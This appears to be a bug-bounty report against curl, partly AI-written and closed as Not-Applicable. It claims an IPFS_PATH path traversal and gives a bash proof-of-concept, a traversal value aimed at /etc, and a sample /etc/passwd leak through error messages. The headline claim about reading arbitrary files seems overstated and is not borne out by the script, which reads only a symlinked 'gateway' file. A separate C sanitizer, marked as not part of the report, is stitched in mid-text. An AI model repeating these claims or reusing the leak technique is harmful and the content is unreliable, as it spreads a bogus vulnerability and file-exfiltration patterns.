Path Traversal Vulnerability in curl via Unsanitized IPFS_PATH Environment Variable
High
C
curl
Submitted None
Reported by ziad616
Vulnerability Details
Technical details and impact analysis
A path traversal vulnerability exists in curl versions with IPFS support (7.81.0+). The IPFS_PATH environment variable is not properly sanitized, allowing attackers to read arbitrary files by manipulating directory traversal sequences (e.g., ../../../../etc). This flaw enables leakage of sensitive data (e.g., SSH keys, credentials, system files) via DNS/HTTP error messages.
## Type of AI used:
DeepSeek R1 (used for some of the research, the steps to reproduce, and the description of the vulnerability)
## Affected version:
curl 8.13.0 (and all 7.81.0+ releases with IPFS support)
## curl --version:
```
(x86_64-pc-linux-gnu) libcurl/8.13.0 GnuTLS/3.8.6 zlib/1.3.1 brotli/1.1.0 zstd/1.5.6 libidn2/2.3.7 libpsl/0.21.2 libssh2/1.11.1 nghttp2/1.62.1 ngtcp2/1.6.0 nghttp3/1.4.0 librtmp/2.3 OpenLDAP/2.6.9
Release-Date: 2025-04-02, security patched: 8.13.0-1
Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns ldap ldaps mqtt pop3 pop3s rtmp rtsp scp sftp smb smbs smtp smtps telnet tftp ws wss
Features: alt-svc AsynchDNS brotli GSS-API HSTS HTTP2 HTTP3 HTTPS-proxy IPv6 Kerberos Largefile libz NTLM PSL SPNEGO SSL threadsafe TLS-SRP UnixSockets zstd
```
## System:
Kali GNU/Linux Rolling
## Applicable to:
1. CI/CD pipelines (leak build secrets).
2. Containers (escape to read host files).
3. Shared hosting environments.
## Steps To Reproduce (simple way):
1. Create data-fetcher.sh.
2. Add the following to data-fetcher.sh:
```bash
#!/bin/bash
# 1. Create test file with unique URL-like content
TEST_CONTENT="http://LEAKED_DATA_$(date +%s).invalid"
echo "$TEST_CONTENT" > /tmp/test_file.txt
# 2. Setup exploit
EXPLOIT_DIR=$(mktemp -d)
ln -sf /tmp/test_file.txt "$EXPLOIT_DIR/gateway"
export IPFS_PATH="$EXPLOIT_DIR"
# 3. Trigger the vulnerability
echo "[+] Testing exploit - should leak: $TEST_CONTENT"
curl -v ipfs://dummycid 2>&1 | grep -A1 "Could not resolve host"
# 4. Cleanup
unset IPFS_PATH
rm -rf "$EXPLOIT_DIR" /tmp/test_file.txt
```
3. Run it:
```bash
chmod +x data-fetcher.sh
./data-fetcher.sh
```
Output:
```
[+] Testing exploit - should leak: http://LEAKED_DATA_1744992527.invalid
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Could not resolve host: LEAKED_DATA_1744992527.invalid
shutting down connection #0
curl: (6) Could not resolve host: LEAKED_DATA_1744992527.invalid
```
## Simple Example:
Scenario: Document Viewer App
App Purpose: Lets users view files stored on IPFS (e.g., ipfs://QmPDF).
How It Works:
```
# App uses curl to fetch files
curl --ipfs-gateway https://trusted-gateway.com ipfs://QmPDF
```
Attack (no app compromise)
Attacker action: sets a malicious path:
```bash
export IPFS_PATH="/tmp/../../../../etc"   # traverse to /etc
```
(No hacking required! Just setting an environment variable.)
User action: uses the app normally (e.g., clicks "View PDF").
Result:
curl reads /etc/passwd instead of the PDF.
File contents leak via errors:
```
curl: (6) Could not resolve host: root:x:0:0:root:/root:/bin/bash
```
Key Clarifications
1. App is not at fault: it uses curl correctly; there are no code flaws or misconfigurations.
2. Attacker needs only: access to set environment variables (e.g., in shared hosting, CI/CD); no app/backend hacking required.
3. User is innocent: they just use the app normally.
Real-World Analogy
Imagine a delivery app (curl) that blindly trusts addresses provided by outsiders (IPFS_PATH).
Attacker: Tricks the app into delivering a package to /etc/passwd instead of the user’s home.
Result: The app leaks sensitive mail (files) it shouldn’t access.
## Mitigation:
1. Sanitize IPFS_PATH:
   - Use realpath() to resolve absolute paths.
   - Block directory traversal sequences (..).
2. Disable IPFS by default: enable it only in trusted environments.
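As an added defensive example (not curl's code and not part of the report), here is the sanitization the mitigation list asks for, written in C since curl is a C code base: reject a relative IPFS_PATH, reject any ".." component on the raw string before calling realpath() (realpath() alone would silently collapse /tmp/../../../../etc to /etc), require the result to be a directory, and additionally refuse a "gateway" entry that is not a regular file, since the PoC above plants a symlink under that name. The names validate_ipfs_path, has_dotdot_component, gateway_file_is_regular and selfcheck_gateway_symlink_rejected are this example's own; the self-check builds a throwaway fixture under /tmp and removes it again.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE
#endif
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Outcome of validating the raw IPFS_PATH value (names are this example's own). */
enum ipfs_path_status {
    IPFS_PATH_OK = 0,
    IPFS_PATH_UNSET,          /* variable absent or empty */
    IPFS_PATH_NOT_ABSOLUTE,   /* must start with '/' so it is not relative to the cwd */
    IPFS_PATH_HAS_DOTDOT,     /* a ".." component: refuse before resolving anything */
    IPFS_PATH_UNRESOLVABLE,   /* realpath() failed (missing dir, dangling symlink, too long) */
    IPFS_PATH_NOT_DIR         /* resolved to something other than a directory */
};

/* Returns 1 if any '/'-separated component of p is exactly "..", else 0.
 * Deliberately checks the raw string: "..b" or "c.." are ordinary names. */
int has_dotdot_component(const char *p) {
    while (*p) {
        const char *end = strchr(p, '/');
        size_t n = end ? (size_t)(end - p) : strlen(p);
        if (n == 2 && p[0] == '.' && p[1] == '.')
            return 1;
        if (!end)
            break;
        p = end + 1;
    }
    return 0;
}

/* Validate raw; on success copy the canonical directory into out (if non-NULL). */
enum ipfs_path_status validate_ipfs_path(const char *raw, char *out, size_t outlen) {
    char resolved[PATH_MAX];
    struct stat st;

    if (!raw || !*raw)
        return IPFS_PATH_UNSET;
    if (raw[0] != '/')
        return IPFS_PATH_NOT_ABSOLUTE;
    if (has_dotdot_component(raw))
        return IPFS_PATH_HAS_DOTDOT;
    if (!realpath(raw, resolved))
        return IPFS_PATH_UNRESOLVABLE;
    if (stat(resolved, &st) != 0 || !S_ISDIR(st.st_mode))
        return IPFS_PATH_NOT_DIR;
    if (out)
        snprintf(out, outlen, "%s", resolved);
    return IPFS_PATH_OK;
}

/* lstat() (not stat()) looks at the "gateway" entry itself, so a symlink to
 * some other file, as planted by the PoC, does not count as a regular file. */
int gateway_file_is_regular(const char *dir) {
    char path[PATH_MAX];
    struct stat st;
    if (snprintf(path, sizeof path, "%s/gateway", dir) >= (int)sizeof path)
        return 0;
    if (lstat(path, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode);
}

/* Constructed self-check: temp dir under /tmp, first with a symlinked "gateway"
 * (must be refused), then with a regular one (must pass). Returns 1 when both
 * behave as intended, 0 otherwise; always cleans up after itself. */
int selfcheck_gateway_symlink_rejected(void) {
    char dir[] = "/tmp/ipfs_path_check_XXXXXX";
    char target[PATH_MAX], lnk[PATH_MAX];
    FILE *f;
    int ok = 0;

    if (!mkdtemp(dir))
        return 0;
    snprintf(target, sizeof target, "%s/secret.txt", dir);
    snprintf(lnk, sizeof lnk, "%s/gateway", dir);
    f = fopen(target, "w");
    if (!f)
        goto out;
    fputs("http://constructed-example.invalid\n", f);  /* stands in for a file an attacker wants read */
    fclose(f);
    if (symlink(target, lnk) != 0)
        goto out;
    ok = !gateway_file_is_regular(dir);           /* symlink must be refused */
    unlink(lnk);
    if (rename(target, lnk) != 0) {
        ok = 0;
        goto out;
    }
    ok = ok && gateway_file_is_regular(dir);      /* plain file must pass */
out:
    unlink(lnk);
    unlink(target);
    rmdir(dir);
    return ok;
}

int main(void) {
    char dir[PATH_MAX];
    enum ipfs_path_status s = validate_ipfs_path(getenv("IPFS_PATH"), dir, sizeof dir);
    printf("IPFS_PATH status=%d%s%s\n", (int)s, s == IPFS_PATH_OK ? " dir=" : "", s == IPFS_PATH_OK ? dir : "");
    printf("self-check: %s\n", selfcheck_gateway_symlink_rejected() ? "ok" : "FAILED");
    return 0;
}
```

Run it with IPFS_PATH set to the traversal value from the example above and the function returns IPFS_PATH_HAS_DOTDOT without ever touching the filesystem; with a legitimate directory it returns the canonical path for the caller to use instead of the raw variable.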
## CVSS 3.1:
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N (High)
## Supporting Material/References:
{F4265018}
{F4265019}
{F4265020}
{F4265023}
## Impact
Theft of credentials, SSH keys, and system files.
Report Details
Additional information and metadata
State
Closed
Substate
Not-Applicable
Submitted
Weakness
Path Traversal